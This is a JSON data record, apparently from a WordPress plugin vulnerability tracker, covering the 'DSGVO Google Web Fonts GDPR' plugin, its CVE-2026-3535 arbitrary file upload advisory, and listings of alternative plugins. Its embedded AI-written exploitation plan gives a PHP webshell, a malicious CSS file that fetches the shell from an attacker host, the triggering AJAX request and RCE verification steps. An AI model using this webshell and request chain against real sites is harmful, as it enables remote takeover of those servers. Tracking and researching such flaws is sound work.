[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fY0QJSnlKtW6XI_kY1Aj7adel2VayoGEBOXZAi7UwcXg":3,"$fXwZ4OrHDZpiW6TYycVG97cMTOHFSgMjD7xyglOgYMZI":297,"$fqB41ZF9FuigONtoHLgQABp_FQCXNPZKtA58sH7UHsDE":301},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":17,"tags":18,"homepage":22,"download_link":23,"security_score":24,"vuln_count":25,"unpatched_count":25,"last_vuln_date":26,"fetched_at":27,"discovery_status":28,"vulnerabilities":29,"developer":52,"crawl_stats":35,"alternatives":59,"analysis":161,"fingerprints":281},"dsgvo-google-web-fonts-gdpr","DSGVO Google Web Fonts GDPR","1.1","mlfactory","https:\u002F\u002Fprofiles.wordpress.org\u002Fmlfactory\u002F","\u003Cp>The Plugin scan yout Theme functions.php file if there any Google Font calls.\u003Cbr \u002F>\nIf there any calls to the Google font serber, the plugin get the font url – download the font to your sever\u002Fwebhost and add a new css file to your theme.\u003Cbr \u002F>\nAlso the Plugin blocks the calls to the Google font server.\u003Cbr \u002F>\nSo all fonts there are definied in the themes functions.php file can be used without ANY calls to the Google Servers.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>In the free version only WordPress default themes are supported\u003C\u002Fstrong>\u003Cbr \u002F>\n(Twenty Fifteen, Twenty Seventeen, Twenty Sixteen)\u003C\u002Fp>\n\u003Ch4>Features Free Version\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>Automatically scans your theme functions.php file if there any Google font calls.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>The Plugin download the founded fonts in your themes function.php file to your webhost\u002Fserver.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Blocks loading Google Fonts from the Google Server (load fonts from local webhost\u002Fserver)\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Adds a new CSS file to you theme via a hook so the fonts can normally be use\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Features PRO Version\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>All Features of the free version\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Supports \u003Cstrong>ALL\u003C\u002Fstrong> themes\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Setup assistance by one of our employees\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Premium Support & Premium Updates for Lifetime\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Costs &euro;6,99,- \u002F Licence for one Domain.\u003C\u002Fp>\n\u003Cp>To buy the Pro version please contact me at michaelleithold18@gmail.com.\u003C\u002Fp>\n","The Plugin scan yout Theme functions.php file if there any Google Font calls. If there any calls to the Google font serber, the plugin get the font ur &hellip;",30,9433,100,2,"2019-03-23T15:46:00.000Z","5.1.22","",[19,20,21],"dsgvo","gdpr","google-fonts","http:\u002F\u002Fwww.mlfactory.de\u002Fdsgvo-google-web-fonts-gdpr","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdsgvo-google-web-fonts-gdpr.1.1.zip",55,1,"2026-04-07 17:40:04","2026-04-06T09:54:40.288Z","no_bundle",[30],{"id":31,"url_slug":32,"title":33,"description":34,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":26,"updated_date":41,"references":42,"days_to_patch":35,"patch_diff_files":44,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":49,"research_started_at":50,"research_completed_at":51,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-3535","dsgvo-google-web-fonts-gdpr-unauthenticated-arbitrary-file-upload-via-fonturl-parameter","DSGVO Google Web Fonts GDPR \u003C= 1.1 - Unauthenticated Arbitrary File Upload via 'fonturl' Parameter","The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via a `wp_ajax_nopriv_` hook, requiring no authentication. It fetches a user-supplied URL as a CSS file, extracts URLs from its content, and downloads those files to a publicly accessible directory without validating the file type. This makes it possible for unauthenticated attackers to upload arbitrary files including PHP webshells, leading to remote code execution. The exploit requires the site to use one of a handful of specific themes (twentyfifteen, twentyseventeen, twentysixteen, storefront, salient, or shapely).",null,"\u003C=1.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-08 06:43:39",[43],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6203ffaf-5efd-4c66-85f0-cc3a05a03084?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3535 (DSGVO Google Web Fonts GDPR)\n\n## 1. Vulnerability Summary\nThe **DSGVO Google Web Fonts GDPR** plugin (up to version 1.1) is vulnerable to **Unauthenticated Arbitrary File Upload** leading to Remote Code Execution (RCE). The vulnerability exists in the `DSGVOGWPdownloadGoogleFonts()` function, which is hooked into `wp_ajax_nopriv_DSGVOGWPdownloadGoogleFonts`. \n\nThe function takes a user-supplied URL (`fonturl`), fetches its content (intended to be a Google Fonts CSS file), parses the content for URLs using a regular expression (identifying font file links), and then downloads those identified files to a publicly accessible directory on the WordPress server. Crucially, the plugin fails to validate the file extension or MIME type of the files downloaded from the URLs extracted from the CSS content. An attacker can provide a \"CSS\" file containing a link to a PHP shell, causing the plugin to fetch and store the shell on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `DSGVOGWPdownloadGoogleFonts`\n- **Hook:** `wp_ajax_nopriv_DSGVOGWPdownloadGoogleFonts` (Unauthenticated) and `wp_ajax_DSGVOGWPdownloadGoogleFonts` (Authenticated).\n- **Vulnerable Parameter:** `fonturl` (POST or GET, typically POST in AJAX).\n- **Preconditions:**\n    - The WordPress site must be running one of the following themes: `twentyfifteen`, `twentyseventeen`, `twentysixteen`, `storefront`, `salient`, or `shapely`. (The plugin likely checks the current theme name via `wp_get_theme()->get_template()`).\n    - The `wp-content\u002Fuploads\u002F` directory must be writeable (standard for WordPress).\n\n## 3. Code Flow (Inferred)\n1. **Entry:** A request is sent to `admin-ajax.php?action=DSGVOGWPdownloadGoogleFonts`.\n2. **Hook Execution:** WordPress triggers the `DSGVOGWPdownloadGoogleFonts()` function.\n3. **Theme Check:** The function likely checks `if ( in_array( wp_get_theme()->get_template(), [...] ) )`.\n4. **CSS Fetch:** The code retrieves the URL from `$_POST['fonturl']`.\n5. **Content Retrieval:** The plugin uses `wp_remote_get( $fonturl )` to fetch the \"CSS\" content.\n6. **Regex Parsing:** It uses a regex like `\u002Furl\\(['\"]?([^'\")]+\\.(?:ttf|woff2?|eot|otf|php))['\"]?\\)\u002Fi` (or even broader) to find file URLs within the CSS.\n7. **Download Loop:** For each match, it calls `wp_remote_get( $file_url )`.\n8. **Sink:** The content of the downloaded file is saved to the filesystem using `file_put_contents()` or `WP_Filesystem` in a directory like `wp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002F`. No extension checking is performed on the `$file_url` or the resulting filename.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability is described as unauthenticated and reachable via `nopriv`. However, many WordPress AJAX handlers still implement a nonce check via `check_ajax_referer`. \n\n### Nonce Investigation\n1. **Search for Nonce Creation:** Search the plugin source for `wp_create_nonce`. Look for the action string (e.g., `dsgvo-gdpr-nonce`).\n2. **Search for Localized Scripts:** Look for `wp_localize_script`.\n   - **Target Variable (Inferred):** `window.dsgvogwp_ajax?.nonce` or `window.dsgvo_gdpr_vars?.nonce`.\n3. **Triggering Nonce Generation:** The plugin likely only enqueues the script and nonce if the theme is supported and\u002For a specific setting is enabled.\n4. **Acquisition Steps:**\n   - Install and activate a supported theme: `wp theme install twentyseventeen --activate`.\n   - Create a dummy post to ensure frontend scripts load: `wp post create --post_status=publish --post_content='Testing Fonts'`.\n   - Navigate to the homepage.\n   - Use `browser_eval` to find the nonce:\n     ```javascript\n     \u002F\u002F Example (search for common patterns if exact key is unknown)\n     Object.keys(window).find(key => key.includes('dsgvo')) \n     ```\n\n## 5. Exploitation Strategy\nThe exploit requires an external \"attacker\" server to host two files: the malicious CSS and the PHP shell.\n\n### Step 1: Prepare Attacker Files\n1. **PHP Shell (`shell.php`):**\n   ```php\n   \u003C?php echo shell_exec($_GET['cmd']); ?>\n   ```\n2. **Malicious CSS (`exploit.css`):**\n   ```css\n   @font-face {\n     font-family: 'Exploit';\n     src: url('http:\u002F\u002Fattacker-server.com\u002Fshell.php');\n   }\n   ```\n\n### Step 2: Trigger the Upload\nSend the AJAX request to the target WordPress site.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=DSGVOGWPdownloadGoogleFonts&fonturl=http:\u002F\u002Fattacker-server.com\u002Fexploit.css&nonce=\u003CNONCE_IF_REQUIRED>\n  ```\n\n### Step 3: Locate the Shell\nThe plugin likely creates a subdirectory in `uploads`. Common naming conventions:\n- `\u002Fwp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002Fshell.php`\n- `\u002Fwp-content\u002Fuploads\u002Fdsgvo-fonts\u002Fshell.php`\n\nThe exact path can be identified by:\n1. Monitoring the response of the AJAX call (it might return the local path).\n2. Checking the plugin source for the `wp_upload_dir()` usage.\n\n## 6. Test Data Setup\n1. **Theme Setup:**\n   ```bash\n   wp theme install twentyseventeen --activate\n   ```\n2. **Plugin Activation:**\n   ```bash\n   wp plugin activate dsgvo-google-web-fonts-gdpr\n   ```\n3. **Public Page:** Ensure a public page exists for nonce extraction if needed.\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` status.\n- The plugin will make an outbound request to `attacker-server.com\u002Fexploit.css`.\n- The plugin will then make a second outbound request to `attacker-server.com\u002Fshell.php`.\n- A file named `shell.php` (or similar) will be created in the WordPress uploads directory.\n\n## 8. Verification Steps\n1. **Confirm File Creation (via CLI):**\n   ```bash\n   find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"shell.php\"\n   ```\n2. **Verify RCE:**\n   Perform an HTTP request to the uploaded shell:\n   ```bash\n   http_request \"http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002Fshell.php?cmd=id\"\n   ```\n   **Expected Response:** Contains output of the `id` command (e.g., `uid=33(www-data)`).\n\n## 9. Alternative Approaches\n- **Path Traversal:** If the filename is extracted from the URL, check if `src: url('http:\u002F\u002Fattacker.com\u002F..\u002F..\u002Fshell.php')` allows escaping the intended directory.\n- **Direct Parameter Injection:** If the regex is weak, try `fonturl=http:\u002F\u002Fattacker.com\u002Fexploit.css?url=shell.php`.\n- **Theme Bypass:** If the site is not using a supported theme, try to pass a `template` or `theme` parameter if the plugin uses `$_REQUEST` to determine the current theme context, though this is unlikely given `wp_get_theme()`. If blocked, the researcher must manually switch themes as part of the \"preconditions.\"","gemini-3-flash-preview","2026-04-17 20:33:17","2026-04-17 20:33:36",{"slug":7,"display_name":7,"profile_url":8,"plugin_count":53,"total_installs":54,"avg_security_score":55,"avg_patch_time_days":56,"trust_score":57,"computed_at":58},8,20820,83,318,67,"2026-05-19T18:14:38.718Z",[60,82,102,121,137],{"slug":61,"name":62,"version":63,"author":64,"author_profile":65,"description":66,"short_description":67,"active_installs":68,"downloaded":69,"rating":70,"num_ratings":71,"last_updated":72,"tested_up_to":73,"requires_at_least":74,"requires_php":17,"tags":75,"homepage":78,"download_link":79,"security_score":13,"vuln_count":80,"unpatched_count":80,"last_vuln_date":35,"fetched_at":81},"disable-remove-google-fonts","Disable and Remove Google Fonts | GDPR & DSGVO friendly","1.8.2","fontsplugin","https:\u002F\u002Fprofiles.wordpress.org\u002Ffontsplugin\u002F","\u003Cp>Improve frontend performance by disabling \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Folympus-google-fonts\u002F\" rel=\"ugc\">Google Fonts\u003C\u002Fa> loaded by themes and plugins.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Looking to Host Google Fonts locally? Check out \u003Ca href=\"https:\u002F\u002Ffontsplugin.com\u002Fdrgf-upgrade\u002F\" rel=\"nofollow ugc\">Fonts Plugin Pro\u003C\u002Fa>.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>While this plugin removes Google Fonts from as many themes and plugins as possible, some require additional steps, we have detailed those here: \u003Ca href=\"https:\u002F\u002Ffontsplugin.com\u002Fremove-disable-google-fonts\u002F\" rel=\"nofollow ugc\">Remove Google Fonts from WordPress\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>After installing this plugin, clear your website cache and test your site using the free \u003Ca href=\"https:\u002F\u002Ffontsplugin.com\u002Fgoogle-fonts-checker\" rel=\"nofollow ugc\">Google Fonts Checker\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>New “Check Google Fonts” Feature\u003C\u002Fh4>\n\u003Cp>This plugin now includes a new “Check Google Fonts” feature. This feature allows you to check if Google Fonts are being loaded on your website. It does this by capturing the full HTML of the current page and checking for Google Fonts references.\u003C\u002Fp>\n\u003Cp>To use this feature, simply click the “Check Google Fonts” button in the admin bar. This will open a new window\u002Ftab with the results.\u003C\u002Fp>\n\u003Cp>The results will show you:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>The number of Google Fonts that are being loaded\u003C\u002Fli>\n\u003Cli>The URLs of the Google Fonts that are being loaded\u003C\u002Fli>\n\u003Cli>The source of the Google Fonts that are being loaded\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Plugin Compatibility\u003C\u002Fh4>\n\u003Cp>This plugin will work with all WordPress themes and has been specifically tested with the following:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Twenty Twelve\u003C\u002Fli>\n\u003Cli>Twenty Thirteen\u003C\u002Fli>\n\u003Cli>Twenty Fourteen\u003C\u002Fli>\n\u003Cli>Twenty Fifteen\u003C\u002Fli>\n\u003Cli>Twenty Sixteen\u003C\u002Fli>\n\u003Cli>Twenty Seventeen\u003C\u002Fli>\n\u003Cli>Twenty Nineteen\u003C\u002Fli>\n\u003Cli>Twenty Twenty\u003C\u002Fli>\n\u003Cli>Twenty Twenty-One\u003C\u002Fli>\n\u003Cli>Twenty Twenty-Two\u003C\u002Fli>\n\u003Cli>Twenty Twenty-Three\u003C\u002Fli>\n\u003Cli>Twenty Twenty-Four\u003C\u002Fli>\n\u003Cli>Twenty Twenty-Five\u003C\u002Fli>\n\u003Cli>Acabado\u003C\u002Fli>\n\u003Cli>Avada\u003C\u002Fli>\n\u003Cli>Blocksy\u003C\u002Fli>\n\u003Cli>ColorMag\u003C\u002Fli>\n\u003Cli>Divi Extra\u003C\u002Fli>\n\u003Cli>Enfold\u003C\u002Fli>\n\u003Cli>GeneratePress\u003C\u002Fli>\n\u003Cli>Hestia\u003C\u002Fli>\n\u003Cli>Hueman\u003C\u002Fli>\n\u003Cli>JupiterX\u003C\u002Fli>\n\u003Cli>Kadence\u003C\u002Fli>\n\u003Cli>Neve\u003C\u002Fli>\n\u003Cli>OnePress\u003C\u002Fli>\n\u003Cli>Shapely\u003C\u002Fli>\n\u003Cli>Stackable\u003C\u002Fli>\n\u003Cli>Storefront\u003C\u002Fli>\n\u003Cli>Sydney\u003C\u002Fli>\n\u003Cli>Vantage\u003C\u002Fli>\n\u003Cli>Zerif Lite\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>It will also remove Google Fonts loaded by the following plugins:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Divi\u003C\u002Fli>\n\u003Cli>Redux\u003C\u002Fli>\n\u003Cli>MailPoet\u003C\u002Fli>\n\u003Cli>Elementor\u003C\u002Fli>\n\u003Cli>GroovyMenu\u003C\u002Fli>\n\u003Cli>Kadence Blocks\u003C\u002Fli>\n\u003Cli>Beaver Builder\u003C\u002Fli>\n\u003Cli>Revolution Slider\u003C\u002Fli>\n\u003Cli>Ajax Search Lite & Pro\u003C\u002Fli>\n\u003Cli>WPBakery (Visual Composer)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>As well as improving page load speed, removing Google Font references can also aid with GDPR and DSGVO compliance.\u003C\u002Fp>\n\u003Ch4>Bugs\u003C\u002Fh4>\n\u003Cp>If you find an issue with this plugin, please let us know \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fdisable-remove-google-fonts#new-post\" rel=\"ugc\">here\u003C\u002Fa>!\u003C\u002Fp>\n\u003Ch4>Contributions\u003C\u002Fh4>\n\u003Cp>Anyone is welcome to contribute to this plugin.\u003C\u002Fp>\n\u003Cp>There are various ways you can contribute:\u003C\u002Fp>\n\u003Col>\n\u003Cli>Raise an \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fdisable-remove-google-fonts#new-post\" rel=\"ugc\">Issue\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Translate the Disable and Remove Google Fonts plugin into \u003Ca href=\"https:\u002F\u002Ftranslate.wordpress.org\u002Fprojects\u002Fwp-plugins\u002Fdisable-remove-google-fonts\u002F\" rel=\"nofollow ugc\">different languages\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Provide feedback and suggestions on \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fdisable-remove-google-fonts#new-post\" rel=\"ugc\">enhancements\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Fol>\n","Improve frontend performance by disabling Google Fonts. GDPR and DSGVO friendly.",100000,2851341,90,46,"2026-01-19T16:05:00.000Z","6.9.4","4.8",[76,19,20,21,77],"disable-google-fonts","optimize","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdisable-remove-google-fonts\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisable-remove-google-fonts.1.8.2.zip",0,"2026-04-16T10:56:18.058Z",{"slug":83,"name":84,"version":85,"author":86,"author_profile":87,"description":88,"short_description":89,"active_installs":90,"downloaded":91,"rating":92,"num_ratings":93,"last_updated":94,"tested_up_to":95,"requires_at_least":96,"requires_php":97,"tags":98,"homepage":17,"download_link":100,"security_score":101,"vuln_count":80,"unpatched_count":80,"last_vuln_date":35,"fetched_at":81},"selfhost-google-fonts","Self-Hosted Google Fonts","1.0.1","asadkn","https:\u002F\u002Fprofiles.wordpress.org\u002Fasadkn\u002F","\u003Cp>An easy way to self-host all your Google Fonts for increased Privacy or to meet a law requirement.\u003Cbr \u002F>\nTheme and plugin authors are often unwilling to offer a self-hosted method and it’s quite laborious to download and upload each of the required font.\u003C\u002Fp>\n\u003Cp>This plugin makes it all easy. It will scan all CSS on your site and automagically download and host on your server the necessary Google Web Fonts.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>How it works:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Converts all Google Font enqueues to locally hosted CSS files.\u003C\u002Fli>\n\u003Cli>Scans and converts any inline style tags using @imports for fonts.\u003C\u002Fli>\n\u003Cli>Processes all the local CSS files that weren’t properly enqueued (bad authors?).\u003C\u002Fli>\n\u003Cli>While doing so, downloads all the required Google Fonts to your server.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Automatic self-hosted fonts with no effort.\u003C\u002Fli>\n\u003Cli>Compatible with all themes and plugins.\u003C\u002Fli>\n\u003Cli>Supports IE9+ and all modern browsers.\u003C\u002Fli>\n\u003Cli>Optimized code benchmarked for performance.\u003C\u002Fli>\n\u003Cli>Built-in cache for processing.\u003C\u002Fli>\n\u003Cli>Compatible with cache plugins and Autoptimize.\u003C\u002Fli>\n\u003Cli>API and hooks for theme & plugin authors.\u003C\u002Fli>\n\u003Cli>Uses unicode-range for optimized fonts when using multiple subsets. Google officially does this too, but other solutions for downloading fonts don’t support this.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Dev Notes\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cem>Cache\u003C\u002Fem>: The most common reason for a failure. If you have a cache plugin, clear the caches.\u003C\u002Fp>\n\u003Cp>It will not work with JS solutions like WebFont Loader. If you’re a developer, you can still use this plugin’s API to get the needed CSS and files to convert your WebFont Loader. I will post instructions on support forums if there’s interest.\u003C\u002Fp>\n","Automatically self-host all the Google Fonts on your site. Plug and play.",30000,153397,96,40,"2018-06-15T05:34:00.000Z","4.9.29","4.0","5.4",[19,20,21,99],"typography","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fselfhost-google-fonts.zip",85,{"slug":103,"name":104,"version":105,"author":106,"author_profile":107,"description":108,"short_description":109,"active_installs":110,"downloaded":111,"rating":13,"num_ratings":112,"last_updated":113,"tested_up_to":73,"requires_at_least":114,"requires_php":115,"tags":116,"homepage":119,"download_link":120,"security_score":13,"vuln_count":80,"unpatched_count":80,"last_vuln_date":35,"fetched_at":81},"yabe-webfont","Yabe Webfont – Use Custom Fonts, Google Fonts or Adobe Fonts","1.0.100","Sua","https:\u002F\u002Fprofiles.wordpress.org\u002Fsuabahasa\u002F","\u003Ch3>Yabe Webfont: the #1 Self-hosted Google Fonts and Custom Fonts Manager for WordPress\u003C\u002Fh3>\n\u003Cp>Yabe Webfont is a GDPR-friendly font WordPress plugin made for designers and developers that is advanced, easy to use, and intuitive to give you complete control over your fonts and typography in WordPress.\u003C\u002Fp>\n\u003Ch3>FEATURES\u003C\u002Fh3>\n\u003Cp>Yabe Webfont is packed full of features designed to streamline your workflow. Some of our favorites are:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>GDPR \u002F DSGVO friendly\u003C\u002Fstrong>: You can import\u002Fself-host Google Fonts files from your server through your WordPress admin page. Fewer reasons to worry about GDPR \u002F DSGVO compliance.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Fonts and Adobe Fonts ready\u003C\u002Fstrong>: Start using any available fonts on Google Fonts and Adobe Fonts.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom Fonts\u003C\u002Fstrong>: A dedicated custom fonts manager for WordPress. The central place to manage all your fonts and typography.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Easy to use\u003C\u002Fstrong>: Add custom fonts to your WordPress site with a simple and intuitive interface. No coding knowledge is needed. You can upload the font files using the WordPress media uploader. No FTP is required.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fine-tuning\u003C\u002Fstrong>: Complete control over your fonts and typography. On 90% of use cases, the default one is good to go.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lightweight and blazingly fast\u003C\u002Fstrong>: The font management system uses WordPress REST API and a modern JavaScript framework for an instant, responsive user experience. The front page cache ensures fast loading and reduces database queries.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Variable Fonts support\u003C\u002Fstrong>: The format allows a single font file to contain multiple stylistic variations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multisite support\u003C\u002Fstrong>: The plugin is compatible with WordPress Multisite (Activate the plugin on the site level).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>SEAMLESS INTEGRATION\u003C\u002Fh3>\n\u003Cp>The font must be available for use across different platforms. Yabe Webfont is famous for seamlessly integrating with the most popular visual\u002Fpage builders:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbuilderius.io\u002F?referral=afdfca82c8\" rel=\"nofollow ugc\">Builderius\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fclassic-editor\u002F\" rel=\"ugc\">Classic Editor\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbe.elementor.com\u002Fvisit\u002F?bta=209150&brand=elementor\" rel=\"nofollow ugc\">Elementor\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgeneratepress.com\u002F?ref=7954\" rel=\"nofollow ugc\">GeneratePress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fgutenberg\" rel=\"ugc\">Gutenberg Blocks and Site Editor\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fkadencewp.com\" rel=\"nofollow ugc\">Kadence WP\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fpinegrow.com\u002Fwordpress\" rel=\"nofollow ugc\">Pinegrow\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.wpbeaverbuilder.com\u002F\" rel=\"nofollow ugc\">Beaver Builder\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fcreativethemes.com\u002Fblocksy\" rel=\"nofollow ugc\">Blocksy\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbreakdance.com\u002Fref\u002F165\u002F\" rel=\"nofollow ugc\">Breakdance\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbricksbuilder.io\u002F\" rel=\"nofollow ugc\">Bricks\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fcwicly.com\u002F?ref=suabahasa\" rel=\"nofollow ugc\">Cwicly\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.elegantthemes.com\u002Faffiliates\u002Fidevaffiliate.php?id=47622\" rel=\"nofollow ugc\">Divi\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fetchwp.com\" rel=\"nofollow ugc\">Etch\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fslingblocks\u002F\" rel=\"ugc\">FunnelKit\u002FSlingBlocks\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgreenshiftwp.com\u002F\" rel=\"nofollow ugc\">Greenshift\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Foxygenbuilder.com\u002F\" rel=\"nofollow ugc\">Oxygen\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.sliderrevolution.com\u002F\" rel=\"nofollow ugc\">Slider Revolution\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwpspectra.com\u002F\" rel=\"nofollow ugc\">Spectra\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fyellowpencil.waspthemes.com\u002F\" rel=\"nofollow ugc\">YellowPencil\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fzionbuilder.io\u002F\" rel=\"nofollow ugc\">Zion Builder\u003C\u002Fa> \u003Cstrong>[Pro]\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Visit \u003Ca href=\"https:\u002F\u002Fwebfont.yabe.land\" rel=\"nofollow ugc\">our website\u003C\u002Fa> for more information.\u003C\u002Fp>\n\u003Ch4>Love Yabe Webfont?\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Purchase the \u003Ca href=\"https:\u002F\u002Fwebfont.yabe.land\" rel=\"nofollow ugc\">Pro version\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Join our \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fgroups\u002F1142662969627943\" rel=\"nofollow ugc\">Facebook Group\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Or rate us on \u003Ca 